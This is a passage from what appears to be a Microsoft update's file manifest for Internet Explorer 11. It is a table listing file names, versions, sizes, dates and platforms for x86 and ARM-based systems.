02-Jan-2018| 04:55| x86 \nIedvtool.dll| 11.0.9600.19541| 772,608| 24-Oct-2019| 03:24| x86 \nDiagnosticshub_is.dll| 11.0.9600.17416| 37,888| 31-Oct-2014| 03:29| x86 \nDxtmsft.dll| 11.0.9600.18895| 416,256| 02-Jan-2018| 04:34| x86 \nDxtrans.dll| 11.0.9600.19507| 279,040| 06-Oct-2019| 02:56| x86 \nMicrosoft-windows-ie-f12-provider.ptxml| Not applicable| 11,892| 15-Aug-2014| 22:51| Not applicable \nF12.dll.mui| 11.0.9600.17278| 4,096| 16-Aug-2014| 08:34| Not applicable \nF12.dll.mui| 11.0.9600.17278| 4,096| 16-Aug-2014| 08:35| Not applicable \nF12.dll.mui| 11.0.9600.17278| 4,096| 16-Aug-2014| 08:36| Not applicable \nF12.dll.mui| 11.0.9600.17278| 4,096| 16-Aug-2014| 08:33| Not applicable \nF12.dll.mui| 11.0.9600.17278| 4,096| 16-Aug-2014| 08:34| Not applicable \nF12.dll.mui| 11.0.9600.17278| 4,096| 16-Aug-2014| 08:33| Not applicable \nF12.dll.mui| 11.0.9600.17278| 4,096| 16-Aug-2014| 02:47| Not applicable \nF12.dll.mui| 11.0.9600.17278| 4,096| 16-Aug-2014| 08:32| Not applicable \nF12.dll.mui| 11.0.9600.17278| 4,096| 16-Aug-2014| 08:32| Not applicable \nF12.dll.mui| 11.0.9600.17278| 4,096| 16-Aug-2014| 08:26| Not applicable \nF12.dll.mui| 11.0.9600.17278| 4,096| 16-Aug-2014| 08:27| Not applicable \nF12.dll.mui| 11.0.9600.17278| 4,096| 16-Aug-2014| 08:27| Not applicable \nF12.dll.mui| 11.0.9600.17278| 4,096| 16-Aug-2014| 08:27| Not applicable \nF12.dll.mui| 11.0.9600.17278| 4,096| 16-Aug-2014| 08:26| Not applicable \nF12.dll.mui| 11.0.9600.17278| 3,584| 16-Aug-2014| 08:30| Not applicable \nF12.dll.mui| 11.0.9600.17278| 3,584| 16-Aug-2014| 08:30| Not applicable \nF12.dll.mui| 11.0.9600.17278| 4,096| 16-Aug-2014| 08:29| Not applicable \nF12.dll.mui| 11.0.9600.17278| 4,096| 16-Aug-2014| 08:29| Not applicable \nF12.dll.mui| 11.0.9600.17278| 4,096| 16-Aug-2014| 08:30| Not applicable \nF12.dll.mui| 11.0.9600.17278| 4,096| 16-Aug-2014| 08:30| Not applicable \nF12.dll.mui| 11.0.9600.17278| 4,096| 16-Aug-2014| 08:30| Not applicable \nF12.dll.mui| 11.0.9600.17278| 4,096| 16-Aug-2014| 08:30| Not applicable \nF12.dll.mui| 11.0.9600.17278| 4,096| 16-Aug-2014| 08:31| Not applicable \nF12.dll.mui| 11.0.9600.17278| 4,096| 16-Aug-2014| 08:30| Not applicable \nF12.dll.mui| 11.0.9600.17278| 4,096| 16-Aug-2014| 08:37| Not applicable \nF12.dll.mui| 11.0.9600.17278| 4,096| 16-Aug-2014| 08:37| Not applicable \nF12.dll.mui| 11.0.9600.17278| 4,096| 16-Aug-2014| 08:38| Not applicable \nF12.dll.mui| 11.0.9600.19572| 4,096| 21-Nov-2019| 03:36| Not applicable \nF12.dll.mui| 11.0.9600.17278| 4,096| 16-Aug-2014| 08:37| Not applicable \nF12.dll.mui| 11.0.9600.17278| 4,096| 16-Aug-2014| 08:39| Not applicable \nF12.dll.mui| 11.0.9600.17278| 4,096| 16-Aug-2014| 08:37| Not applicable \nF12.dll.mui| 11.0.9600.17278| 4,096| 16-Aug-2014| 08:37| Not applicable \nF12.dll.mui| 11.0.9600.17278| 3,584| 16-Aug-2014| 08:38| Not applicable \nF12.dll.mui| 11.0.9600.17278| 3,584| 16-Aug-2014| 08:32| Not applicable \nF12.dll.mui| 11.0.9600.17278| 3,584| 16-Aug-2014| 08:34| Not applicable \nDiagnosticstap.dll| 11.0.9600.17905| 174,592| 15-Jun-2015| 20:52| x86 \nF12resources.dll| 11.0.9600.18939| 10,948,096| 10-Feb-2018| 17:17| x86 \nF12tools.dll| 11.0.9600.17905| 255,488| 15-Jun-2015| 20:51| x86 \nF12.dll| 11.0.9600.19507| 1,206,272| 06-Oct-2019| 02:54| x86 \nMsfeeds.dll| 11.0.9600.19572| 696,320| 19-Nov-2019| 07:23| x86 \nMsfeeds.mof| Not applicable| 1,518| 06-Feb-2014| 05:53| Not applicable \nMsfeedsbs.dll| 11.0.9600.17416| 52,736| 31-Oct-2014| 02:53| x86 \nMsfeedsbs.mof| Not applicable| 1,574| 21-Aug-2013| 23:49| Not applicable \nMsfeedssync.exe| 11.0.9600.17416| 11,264| 31-Oct-2014| 03:25| x86 \nMshta.exe| 11.0.9600.17416| 12,800| 31-Oct-2014| 03:28| x86 \nMshtmled.dll| 11.0.9600.19404| 76,288| 10-Jul-2019| 02:48| x86 \nMicrosoft-windows-ie-htmlrendering.ptxml| Not applicable| 3,228| 06-Feb-2014| 05:40| Not applicable \nMshtml.dll| 11.0.9600.19572| 20,290,048| 19-Nov-2019| 08:17| x86 \nMshtml.tlb| 11.0.9600.16518| 2,724,864| 06-Feb-2014| 10:20| Not applicable \nIeadvpack.dll| 11.0.9600.17416| 112,128| 31-Oct-2014| 03:14| x86 \nIeetwcollector.exe| 11.0.9600.18666| 104,960| 16-Apr-2017| 07:47| x86 \nIeetwcollectorres.dll| 11.0.9600.16518| 4,096| 06-Feb-2014| 10:19| x86 \nIeetwproxystub.dll| 11.0.9600.17416| 47,616| 31-Oct-2014| 03:23| x86 \nIelowutil.exe| 11.0.9600.19404| 221,184| 10-Jul-2019| 03:06| x86 \nIeproxy.dll| 11.0.9600.19541| 301,056| 24-Oct-2019| 02:05| x86 \nIeshims.dll| 11.0.9600.19507| 290,304| 06-Oct-2019| 02:32| x86 \nIexpress.exe| 11.0.9600.17416| 152,064| 31-Oct-2014| 03:27| x86 \nWextract.exe| 11.0.9600.17416| 137,728| 31-Oct-2014| 03:28| x86 \nImgutil.dll| 11.0.9600.17416| 40,448| 31-Oct-2014| 02:24| x86 \nExtexport.exe| 11.0.9600.17416| 25,600| 31-Oct-2014| 03:20| x86 \nBing.ico| Not applicable| 5,430| 24-Sep-2013| 02:36| Not applicable \nIeunatt.exe| 11.0.9600.17416| 115,712| 31-Oct-2014| 03:12| x86 \nMicrosoft-windows-ie-internetexplorer-ppdlic.xrm-ms| Not applicable| 2,956| 21-Nov-2019| 02:58| Not applicable \nWindows feed discovered.wav| Not applicable| 19,884| 24-Sep-2013| 02:58| Not applicable \nWindows information bar.wav| Not applicable| 23,308| 24-Sep-2013| 02:58| Not applicable \nWindows navigation start.wav| Not applicable| 11,340| 24-Sep-2013| 02:58| Not applicable \nWindows pop-up blocked.wav| Not applicable| 85,548| 24-Sep-2013| 02:58| Not applicable \nJsdbgui.dll| 11.0.9600.18895| 459,776| 02-Jan-2018| 04:27| x86 \nJsprofilerui.dll| 11.0.9600.18895| 579,584| 02-Jan-2018| 04:27| x86 \nMemoryanalyzer.dll| 11.0.9600.19178| 1,399,296| 12-Oct-2018| 20:16| x86 \nMshtmldac.dll| 11.0.9600.19507| 64,000| 06-Oct-2019| 03:16| x86 \nNetworkinspection.dll| 11.0.9600.19404| 1,075,200| 10-Jul-2019| 02:45| x86 \nDesktop.ini| Not applicable| 65| 18-Jun-2013| 12:18| Not applicable \nOccache.dll| 11.0.9600.17416| 130,048| 31-Oct-2014| 02:48| x86 \nDesktop.ini| Not applicable| 65| 18-Jun-2013| 12:19| Not applicable \nWebcheck.dll| 11.0.9600.19541| 230,400| 24-Oct-2019| 02:33| x86 \nMsdbg2.dll| 12.0.41202.0| 315,008| 30-Sep-2014| 23:00| x86 \nPdm.dll| 12.0.41202.0| 442,992| 30-Sep-2014| 23:00| x86 \nPdmproxy100.dll| 12.0.41202.0| 99,984| 30-Sep-2014| 23:00| x86 \nIcrav03.rat| Not applicable| 8,798| 24-Sep-2013| 02:25| Not applicable \nMsrating.dll| 11.0.9600.19507| 168,960| 06-Oct-2019| 02:57| x86 \nTicrf.rat| Not applicable| 1,988| 24-Sep-2013| 02:26| Not applicable \nIertutil.dll| 11.0.9600.19541| 2,304,000| 24-Oct-2019| 03:04| x86 \nIe4uinit.exe| 11.0.9600.19541| 692,224| 24-Oct-2019| 02:32| x86 \nIernonce.dll| 11.0.9600.17416| 30,720| 31-Oct-2014| 03:15| x86 \nIesetup.dll| 11.0.9600.17416| 62,464| 31-Oct-2014| 03:24| x86 \nInseng.dll| 11.0.9600.17416| 91,136| 31-Oct-2014| 02:56| x86 \nIesysprep.dll| 11.0.9600.17416| 90,624| 31-Oct-2014| 02:56| x86 \nTimeline.dll| 11.0.9600.17416| 153,600| 31-Oct-2014| 02:55| x86 \nTimeline.cpu.xml| Not applicable| 3,197| 24-Jul-2014| 19:11| Not applicable \nTimeline_is.dll| 11.0.9600.17416| 124,416| 31-Oct-2014| 03:15| x86 \nVgx.dll| 11.0.9600.19507| 817,664| 06-Oct-2019| 02:57| x86 \nUrl.dll| 11.0.9600.17416| 235,520| 31-Oct-2014| 03:24| x86 \nIeframe.dll.mui| 11.0.9600.19541| 2,066,432| 24-Oct-2019| 04:45| Not applicable \nIeframe.dll.mui| 11.0.9600.19541| 2,120,704| 24-Oct-2019| 04:44| Not applicable \nIeframe.dll.mui| 11.0.9600.19541| 2,075,136| 24-Oct-2019| 04:44| Not applicable \nIeframe.dll.mui| 11.0.9600.19541| 2,063,360| 24-Oct-2019| 04:44| Not applicable \nIeframe.dll.mui| 11.0.9600.19541| 2,313,728| 24-Oct-2019| 04:44| Not applicable \nIeframe.dll.mui| 11.0.9600.19541| 2,390,016| 24-Oct-2019| 04:47| Not applicable \nIeframe.dll.mui| 11.0.9600.19541| 2,033,664| 24-Oct-2019| 04:46| Not applicable \nIeframe.dll.mui| 11.0.9600.19541| 2,032,640| 24-Oct-2019| 04:00| Not applicable \nIeframe.dll.mui| 11.0.9600.19541| 2,307,584| 24-Oct-2019| 04:45| Not applicable \nIeframe.dll.mui| 11.0.9600.19541| 2,255,360| 24-Oct-2019| 04:45| Not applicable \nIeframe.dll.mui| 11.0.9600.19541| 2,061,312| 24-Oct-2019| 04:45| Not applicable \nIeframe.dll.mui| 11.0.9600.19541| 2,325,504| 24-Oct-2019| 04:44| Not applicable \nIeframe.dll.mui| 11.0.9600.19541| 2,019,840| 24-Oct-2019| 04:45| Not applicable \nIeframe.dll.mui| 11.0.9600.19541| 2,070,528| 24-Oct-2019| 04:44| Not applicable \nIeframe.dll.mui| 11.0.9600.19541| 2,082,304| 24-Oct-2019| 04:44| Not applicable \nIeframe.dll.mui| 11.0.9600.19541| 2,307,072| 24-Oct-2019| 04:45| Not applicable \nIeframe.dll.mui| 11.0.9600.19541| 2,170,368| 24-Oct-2019| 04:45| Not applicable \nIeframe.dll.mui| 11.0.9600.19541| 2,153,984| 24-Oct-2019| 04:45| Not applicable \nIeframe.dll.mui| 11.0.9600.19541| 2,291,712| 24-Oct-2019| 04:45| Not applicable \nIeframe.dll.mui| 11.0.9600.19541| 2,283,520| 24-Oct-2019| 04:45| Not applicable \nIeframe.dll.mui| 11.0.9600.19541| 2,051,584| 24-Oct-2019| 04:45| Not applicable \nIeframe.dll.mui| 11.0.9600.19541| 2,301,440| 24-Oct-2019| 04:45| Not applicable \nIeframe.dll.mui| 11.0.9600.19541| 2,093,056| 24-Oct-2019| 04:44| Not applicable \nIeframe.dll.mui| 11.0.9600.19541| 2,075,136| 24-Oct-2019| 04:48| Not applicable \nIeframe.dll.mui| 11.0.9600.19541| 2,298,880| 24-Oct-2019| 04:46| Not applicable \nIeframe.dll.mui| 11.0.9600.19541| 2,094,080| 24-Oct-2019| 04:46| Not applicable \nIeframe.dll.mui| 11.0.9600.19541| 2,316,800| 24-Oct-2019| 04:45| Not applicable \nIeframe.dll.mui| 11.0.9600.19541| 2,305,024| 24-Oct-2019| 04:46| Not applicable \nIeframe.dll.mui| 11.0.9600.19541| 2,278,912| 24-Oct-2019| 04:46| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,286,080| 21-Nov-2019| 03:37| Not applicable \nIeframe.dll.mui| 11.0.9600.19541| 2,059,776| 24-Oct-2019| 04:46| Not applicable \nIeframe.dll.mui| 11.0.9600.19541| 2,315,264| 24-Oct-2019| 04:40| Not applicable \nIeframe.dll.mui| 11.0.9600.19541| 2,278,912| 24-Oct-2019| 04:40| Not applicable \nIeframe.dll.mui| 11.0.9600.19541| 2,324,480| 24-Oct-2019| 04:40| Not applicable \nIeframe.dll.mui| 11.0.9600.19541| 2,098,176| 24-Oct-2019| 04:40| Not applicable \nIeframe.dll.mui| 11.0.9600.19541| 1,890,304| 24-Oct-2019| 04:44| Not applicable \nIeframe.dll.mui| 11.0.9600.19541| 1,890,304| 24-Oct-2019| 04:44| Not applicable \nIeframe.dll| 11.0.9600.19572| 13,838,336| 19-Nov-2019| 07:20| x86 \nIeframe.ptxml| Not applicable| 24,486| 06-Feb-2014| 05:40| Not applicable \nIeinstal.exe| 11.0.9600.18921| 475,648| 10-Feb-2018| 05:35| x86 \nInetres.adml| Not applicable| 523,798| 24-Oct-2019| 04:44| Not applicable \nInetres.adml| Not applicable| 497,168| 24-Oct-2019| 04:45| Not applicable \nInetres.adml| Not applicable| 549,601| 24-Oct-2019| 04:44| Not applicable \nInetres.adml| Not applicable| 938,813| 24-Oct-2019| 04:45| Not applicable \nInetres.adml| Not applicable| 455,538| 24-Oct-2019| 04:00| Not applicable \nInetres.adml| Not applicable| 541,364| 24-Oct-2019| 04:44| Not applicable \nInetres.adml| Not applicable| 523,828| 24-Oct-2019| 04:44| Not applicable \nInetres.adml| Not applicable| 573,051| 24-Oct-2019| 04:44| Not applicable \nInetres.adml| Not applicable| 567,797| 24-Oct-2019| 04:44| Not applicable \nInetres.adml| Not applicable| 545,645| 24-Oct-2019| 04:44| Not applicable \nInetres.adml| Not applicable| 635,718| 24-Oct-2019| 04:44| Not applicable \nInetres.adml| Not applicable| 522,947| 24-Oct-2019| 04:44| Not applicable \nInetres.adml| Not applicable| 486,171| 24-Oct-2019| 04:44| Not applicable \nInetres.adml| Not applicable| 546,070| 24-Oct-2019| 04:44| Not applicable \nInetres.adml| Not applicable| 556,258| 24-Oct-2019| 04:45| Not applicable \nInetres.adml| Not applicable| 532,548| 24-Oct-2019| 04:45| Not applicable \nInetres.adml| Not applicable| 539,045| 24-Oct-2019| 04:47| Not applicable \nInetres.adml| Not applicable| 799,803| 24-Oct-2019| 04:46| Not applicable \nInetres.adml| Not applicable| 501,599| 24-Oct-2019| 04:44| Not applicable \nInetres.adml| Not applicable| 518,930| 24-Oct-2019| 04:39| Not applicable \nInetres.adml| Not applicable| 418,138| 24-Oct-2019| 04:40| Not applicable \nInetres.adml| Not applicable| 434,747| 24-Oct-2019| 04:44| Not applicable \nInetres.adml| Not applicable| 434,747| 24-Oct-2019| 04:44| Not applicable \nInetres.admx| Not applicable| 1,675,975| 24-Oct-2019| 00:29| Not applicable \nInetcomm.dll| 6.3.9600.19572| 880,640| 19-Nov-2019| 07:28| x86 \nInetres.dll| 6.3.9600.16384| 84,480| 22-Aug-2013| 04:14| x86 \nJscript9.dll| 11.0.9600.19572| 4,112,384| 19-Nov-2019| 07:26| x86 \nJscript9diag.dll| 11.0.9600.19101| 620,032| 19-Jul-2018| 03:54| x86 \nJscript.dll| 5.8.9600.19572| 662,528| 19-Nov-2019| 07:49| x86 \nVbscript.dll| 5.8.9600.19573| 496,640| 21-Nov-2019| 02:16| x86 \n \n## Internet Explorer 11 on all supported ARM-based versions\n\n**File name**| **File version**| **File size**| **Date**| **Time**| **Platform** \n---|---|---|---|---|--- \nActxprxy.dll| 6.3.9600.19301| 1,064,960| 26-Feb-2019| 05:59| Not applicable \nHlink.dll| 6.3.9600.19101| 68,608| 19-Jul-2018| 03:30| Not applicable \nPngfilt.dll| 11.0.9600.16384| 47,616| 22-Aug-2013| 03:06| Not applicable \nUrlmon.dll| 11.0.9600.19572| 1,037,824| 19-Nov-2019| 16:35| Not applicable \nIexplore.exe| 11.0.9600.19507| 807,816| 06-Oct-2019| 03:26| Not applicable \nWininetplugin.dll| 6.3.9600.16384| 33,792| 22-Aug-2013| 02:52| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 46,592| 12-Nov-2016| 21:08| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 52,736| 12-Nov-2016| 21:08| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 51,200| 12-Nov-2016| 21:08| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 51,200| 12-Nov-2016| 21:08| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 56,320| 12-Nov-2016| 21:08| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 57,856| 12-Nov-2016| 21:09| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 49,664| 12-Nov-2016| 21:09| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 49,664| 12-Nov-2016| 18:19| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 54,272| 12-Nov-2016| 21:09| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 47,616| 12-Nov-2016| 21:09| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 49,152| 12-Nov-2016| 21:09| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 55,296| 12-Nov-2016| 21:08| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 45,056| 12-Nov-2016| 21:09| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 51,712| 12-Nov-2016| 21:09| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 51,712| 12-Nov-2016| 21:09| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 53,248| 12-Nov-2016| 21:09| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 39,424| 12-Nov-2016| 21:09| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 35,840| 12-Nov-2016| 21:09| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 50,176| 12-Nov-2016| 21:09| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 51,200| 12-Nov-2016| 21:09| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 50,688| 12-Nov-2016| 21:09| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 52,736| 12-Nov-2016| 21:10| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 53,760| 12-Nov-2016| 21:09| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 54,272| 12-Nov-2016| 21:08| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 54,272| 12-Nov-2016| 21:07| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 52,736| 12-Nov-2016| 21:08| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 51,200| 12-Nov-2016| 21:08| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 53,248| 12-Nov-2016| 21:08| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 52,736| 12-Nov-2016| 21:08| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 51,712| 21-Nov-2019| 03:11| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 50,688| 12-Nov-2016| 21:07| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 50,688| 12-Nov-2016| 21:06| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 50,176| 12-Nov-2016| 21:06| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 50,176| 12-Nov-2016| 21:06| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 31,232| 12-Nov-2016| 21:06| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 31,232| 12-Nov-2016| 21:08| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 31,232| 12-Nov-2016| 21:08| Not applicable \nHtml.iec| 2019.0.0.19301| 320,000| 26-Feb-2019| 06:35| Not applicable \nInetcpl.cpl| 11.0.9600.19537| 2,007,040| 11-Oct-2019| 01:24| Not applicable \nMshtml.dll.mui| 11.0.9600.19507| 307,200| 06-Oct-2019| 03:51| Not applicable \nMshtml.dll.mui| 11.0.9600.19507| 293,888| 06-Oct-2019| 03:51| Not applicable \nMshtml.dll.mui| 11.0.9600.19507| 290,304| 06-Oct-2019| 03:51| Not applicable \nMshtml.dll.mui| 11.0.9600.19507| 289,280| 06-Oct-2019| 03:51| Not applicable \nMshtml.dll.mui| 11.0.9600.19507| 299,008| 06-Oct-2019| 03:51| Not applicable \nMshtml.dll.mui| 11.0.9600.19507| 303,104| 06-Oct-2019| 03:51| Not applicable \nMshtml.dll.mui| 11.0.9600.19507| 282,112| 06-Oct-2019| 03:51| Not applicable \nMshtml.dll.mui| 11.0.9600.19507| 282,112| 06-Oct-2019| 03:16| Not applicable \nMshtml.dll.mui| 11.0.9600.19507| 296,960| 06-Oct-2019| 03:52| Not applicable \nMshtml.dll.mui| 11.0.9600.19507| 283,648| 06-Oct-2019| 03:51| Not applicable \nMshtml.dll.mui| 11.0.9600.19507| 291,840| 06-Oct-2019| 03:51| Not applicable \nMshtml.dll.mui| 11.0.9600.19507| 299,520| 06-Oct-2019| 03:51| Not applicable \nMshtml.dll.mui| 11.0.9600.19507| 275,968| 06-Oct-2019| 03:51| Not applicable \nMshtml.dll.mui| 11.0.9600.19507| 290,816| 06-Oct-2019| 03:52| Not applicable \nMshtml.dll.mui| 11.0.9600.19507| 293,376| 06-Oct-2019| 03:51| Not applicable \nMshtml.dll.mui| 11.0.9600.19507| 296,960| 06-Oct-2019| 03:51| Not applicable \nMshtml.dll.mui| 11.0.9600.19507| 258,048| 06-Oct-2019| 03:51| Not applicable \nMshtml.dll.mui| 11.0.9600.19507| 256,512| 06-Oct-2019| 03:51| Not applicable \nMshtml.dll.mui| 11.0.9600.19507| 289,280| 06-Oct-2019| 03:51| Not applicable \nMshtml.dll.mui| 11.0.9600.19507| 288,256| 06-Oct-2019| 03:51| Not applicable \nMshtml.dll.mui| 11.0.9600.19507| 285,184| 06-Oct-2019| 03:51| Not applicable \nMshtml.dll.mui| 11.0.9600.19507| 295,424| 06-Oct-2019| 03:51| Not applicable \nMshtml.dll.mui| 11.0.9600.19507| 297,472| 06-Oct-2019| 03:51| Not applicable \nMshtml.dll.mui| 11.0.9600.19507| 292,864| 06-Oct-2019| 03:50| Not applicable \nMshtml.dll.mui| 11.0.9600.19507| 295,424| 06-Oct-2019| 03:50| Not applicable \nMshtml.dll.mui| 11.0.9600.19507| 294,400| 06-Oct-2019| 03:51| Not applicable \nMshtml.dll.mui| 11.0.9600.19507| 294,400| 06-Oct-2019| 03:50| Not applicable \nMshtml.dll.mui| 11.0.9600.19507| 292,864| 06-Oct-2019| 03:50| Not applicable \nMshtml.dll.mui| 11.0.9600.19507| 290,816| 06-Oct-2019| 03:51| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 290,816| 21-Nov-2019| 03:12| Not applicable \nMshtml.dll.mui| 11.0.9600.19507| 286,208| 06-Oct-2019| 03:50| Not applicable \nMshtml.dll.mui| 11.0.9600.19507| 281,600| 06-Oct-2019| 03:48| Not applicable \nMshtml.dll.mui| 11.0.9600.19507| 286,720| 06-Oct-2019| 03:48| Not applicable \nMshtml.dll.mui| 11.0.9600.19507| 292,352| 06-Oct-2019| 03:48| Not applicable \nMshtml.dll.mui| 11.0.9600.19507| 242,176| 06-Oct-2019| 03:48| Not applicable \nMshtml.dll.mui| 11.0.9600.19507| 243,200| 06-Oct-2019| 03:51| Not applicable \nMshtml.dll.mui| 11.0.9600.19507| 243,200| 06-Oct-2019| 03:51| Not applicable \nF12resources.dll.mui| 11.0.9600.17278| 73,728| 16-Aug-2014| 11:19| Not applicable \nF12resources.dll.mui| 11.0.9600.17278| 67,584| 16-Aug-2014| 11:19| Not applicable \nF12resources.dll.mui| 11.0.9600.17278| 67,584| 16-Aug-2014| 11:19| Not applicable \nF12resources.dll.mui| 11.0.9600.17278| 74,240| 16-Aug-2014| 11:19| Not applicable \nF12resources.dll.mui| 11.0.9600.17278| 78,848| 16-Aug-2014| 11:19| Not applicable \nF12resources.dll.mui| 11.0.9600.17278| 61,440| 16-Aug-2014| 11:19| Not applicable \nF12resources.dll.mui| 11.0.9600.17278| 61,440| 16-Aug-2014| 01:39| Not applicable \nF12resources.dll.mui| 11.0.9600.17278| 74,752| 16-Aug-2014| 11:19| Not applicable \nF12resources.dll.mui| 11.0.9600.17278| 62,464| 16-Aug-2014| 11:19| Not applicable \nF12resources.dll.mui| 11.0.9600.17278| 68,096| 16-Aug-2014| 11:27| Not applicable \nF12resources.dll.mui| 11.0.9600.17278| 75,264| 16-Aug-2014| 11:27| Not applicable \nF12resources.dll.mui| 11.0.9600.17278| 68,608| 16-Aug-2014| 11:28| Not applicable \nF12resources.dll.mui| 11.0.9600.17278| 71,680| 16-Aug-2014| 11:27| Not applicable \nF12resources.dll.mui| 11.0.9600.17278| 73,216| 16-Aug-2014| 11:27| Not applicable \nF12resources.dll.mui| 11.0.9600.17278| 41,472| 16-Aug-2014| 11:18| Not applicable \nF12resources.dll.mui| 11.0.9600.17278| 37,888| 16-Aug-2014| 11:18| Not applicable \nF12resources.dll.mui| 11.0.9600.17278| 68,608| 16-Aug-2014| 11:18| Not applicable \nF12resources.dll.mui| 11.0.9600.17278| 67,584| 16-Aug-2014| 11:18| Not applicable \nF12resources.dll.mui| 11.0.9600.17278| 65,536| 16-Aug-2014| 11:18| Not applicable \nF12resources.dll.mui| 11.0.9600.17278| 74,240| 16-Aug-2014| 11:18| Not applicable \nF12resources.dll.mui| 11.0.9600.17278| 70,656| 16-Aug-2014| 11:18| Not applicable \nF12resources.dll.mui| 11.0.9600.17278| 71,168| 16-Aug-2014| 11:18| Not applicable \nF12resources.dll.mui| 11.0.9600.17278| 71,680| 16-Aug-2014| 11:18| Not applicable \nF12resources.dll.mui| 11.0.9600.17278| 71,168| 16-Aug-2014| 11:18| Not applicable \nF12resources.dll.mui| 11.0.9600.17278| 69,632| 16-Aug-2014| 11:27| Not applicable \nF12resources.dll.mui| 11.0.9600.17278| 68,096| 16-Aug-2014| 11:27| Not applicable \nF12resources.dll.mui| 11.0.9600.17278| 68,608| 16-Aug-2014| 11:26| Not applicable \nF12resources.dll.mui| 11.0.9600.19572| 68,096| 21-Nov-2019| 03:12| Not applicable \nF12resources.dll.mui| 11.0.9600.17278| 65,536| 16-Aug-2014| 11:27| Not applicable \nF12resources.dll.mui| 11.0.9600.17278| 59,904| 16-Aug-2014| 11:27| Not applicable \nF12resources.dll.mui| 11.0.9600.17278| 65,536| 16-Aug-2014| 11:27| Not applicable \nF12resources.dll.mui| 11.0.9600.17278| 69,120| 16-Aug-2014| 11:26| Not applicable \nF12resources.dll.mui| 11.0.9600.17278| 29,696| 16-Aug-2014| 11:27| Not applicable \nF12resources.dll.mui| 11.0.9600.17278| 30,720| 16-Aug-2014| 11:19| Not applicable \nF12resources.dll.mui| 11.0.9600.17278| 30,720| 16-Aug-2014| 11:18| Not applicable \nJavascriptcollectionagent.dll| 11.0.9600.17416| 63,488| 31-Oct-2014| 02:29| Not applicable \nDiagnosticshub.scriptedsandboxplugin.dll| 11.0.9600.17905| 215,552| 15-Jun-2015| 19:49| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 46,080| 11-Jun-2016| 20:02| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 50,176| 11-Jun-2016| 20:02| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 48,640| 11-Jun-2016| 20:02| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 49,664| 11-Jun-2016| 20:02| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 51,712| 11-Jun-2016| 20:02| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 54,272| 11-Jun-2016| 20:03| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 48,128| 11-Jun-2016| 20:03| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 48,128| 11-Jun-2016| 17:09| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 50,176| 11-Jun-2016| 20:03| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 47,616| 11-Jun-2016| 20:03| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 49,152| 11-Jun-2016| 20:04| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 50,688| 11-Jun-2016| 20:02| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 45,056| 11-Jun-2016| 20:03| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 49,152| 11-Jun-2016| 20:03| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 49,152| 11-Jun-2016| 20:03| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 49,664| 11-Jun-2016| 19:54| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 39,936| 11-Jun-2016| 19:53| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 39,424| 11-Jun-2016| 19:53| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 47,616| 11-Jun-2016| 19:53| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 47,616| 11-Jun-2016| 19:53| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 48,640| 11-Jun-2016| 19:53| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 51,200| 11-Jun-2016| 19:53| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 50,688| 11-Jun-2016| 19:53| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 49,152| 11-Jun-2016| 20:03| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 50,176| 11-Jun-2016| 20:02| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 49,152| 11-Jun-2016| 20:02| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 48,640| 